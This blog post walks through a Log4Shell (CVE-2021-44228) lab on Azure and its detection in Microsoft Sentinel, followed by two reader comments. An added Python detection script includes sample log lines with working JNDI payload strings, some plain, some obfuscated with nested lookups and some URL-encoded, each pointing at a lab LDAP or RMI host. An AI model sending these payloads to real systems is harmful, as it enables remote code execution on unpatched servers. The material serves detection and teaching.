This post walks through building a short Log4j lab that reproduces the recent Log4j vulnerability (CVE-2021-44228, "Log4Shell") in your Azure environment and then detecting it with Microsoft Sentinel. Set up this lab in a dedicated environment so that you can exercise your security controls; never run it inside production.
Log4j Overview
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified as being exploited in the wild. PoC code was released, and subsequent investigation showed that exploitation is trivial: the attacker only needs to get a crafted string into something the application logs (a User-Agent header, a form field, a username). Depending on how the system is configured, that string makes the vulnerable application perform a JNDI lookup against an attacker-controlled server, download a payload from it, and execute it.
As with many high-severity RCE flaws, mass scanning for CVE-2021-44228 began on the internet almost immediately, seeking out and exploiting unpatched systems. Because the vulnerability is so recent, many servers, both on-premises and in cloud environments, have yet to be patched. We strongly recommend that organizations upgrade to the latest release of Apache Log4j 2 on all systems (2.15.0 at the time of writing; later releases, 2.16.0 and 2.17.x, closed gaps found in the 2.15.0 fix, so take the newest one available).
Image credit: GovCERT
CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 — the highest possible severity rating.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints,” the description reads. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
LAB Setup
To run the Log4j lab, you need the following requirements, setup, and command:
Note: the PoC below executes touch /tmp/pwned inside the vulnerable web app's container.
Last, verify that the command ran by listing /tmp inside the container; you should see the pwned file:
$ sudo docker exec vulnerable-app ls -la /tmp
Sentinel Detection
The next step is to confirm that the PoC request and the command you ran are visible to the SOC. To see what is going on in the lab environment, forward the platform logs (and the container's web server logs, since the JNDI string lands in the logged request) to your Microsoft Sentinel workspace. Once the logs are in Microsoft Sentinel, use the Log4j hunting queries and analytics rules to detect the malicious JNDI lookups and the outbound LDAP/RMI connections they trigger.
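The detection logic a Sentinel hunting query applies to the forwarded logs, shown here as an added Python example rather than code from the original post: it normalizes each log line (URL decoding, then collapsing the ${lower:...}, ${::-...} and ${...:-default} lookups attackers wrap around "jndi" to evade naive string matching) and then looks for the JNDI lookup. The sample log lines, the attacker address 10.0.0.9, the ports and the lookup paths are all constructed for the example; the second line models the plain PoC request sent in the lab above.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in web/app log lines.

Added example for this post. It runs offline over constructed sample lines;
hosts, ports and paths are made up.
"""
import re
from urllib.parse import unquote

# Lookups used to obfuscate the literal "jndi":
#   ${lower:J} -> j, ${upper:j} -> J, ${::-j} -> j, ${env:NOPE:-j} -> j
# (any lookup with a ":-default" suffix resolves to its default).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup we want to see after normalisation; the scheme is left generic
# because ldap, ldaps, rmi, dns, iiop, ... all reach JNDI.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/}\s]+)", re.IGNORECASE)

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOGS = [
    # benign request
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    # the plain PoC header, as sent from the lab attacker box
    '10.0.0.5 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://10.0.0.9:1389/a}"',
    # same payload hidden behind nested lookups
    '10.0.0.5 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${::-n}${env:NOPE:-d}i:${lower:l}dap://10.0.0.9:1389/a}"',
    # URL-encoded payload in the query string, rmi scheme
    '10.0.0.5 - - [12/Dec/2021:10:01:09 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2F10.0.0.9%3A1099%2Fa%7D HTTP/1.1" 404 "-" "curl/7.79.1"',
    # the word "jndi" on its own must not fire
    '10.0.0.5 - - [12/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 "-" "jndi-scanner-docs/1.0"',
]


def normalize(line: str) -> str:
    """Undo URL encoding and nested lookup obfuscation until the text stops changing."""
    prev, text = None, line
    while text != prev:
        prev = text
        text = unquote(text)  # %24%7B -> ${ ; repeated so double encoding is handled
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)  # innermost first, no braces inside
    return text


def find_jndi(line: str):
    """Return (scheme, host[:port]) of the first JNDI lookup in the line, or None."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def hunt(lines):
    """Return [(line_index, scheme, host)] for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, *found))
    return hits


if __name__ == "__main__":
    for idx, scheme, host in hunt(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {scheme} to {host}")
```

Running the block over the constructed sample flags lines 1, 2 and 3 (the plain PoC, the obfuscated variant and the URL-encoded rmi variant) and leaves the benign lines alone. The extracted host:port is the value to pivot on in Sentinel: the same address should then appear as the destination of the outbound LDAP or RMI connection from the vulnerable container.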
It doesn't seem that Kali is really in the Azure Marketplace anymore. I only see "Kali GUI Linux by Techlatest.net".
Like any other cloud component, this feature changed under Kali GUI Linux by Techlatest.net.
The post will update soon with the latest options to install Kali on Azure.
Elli.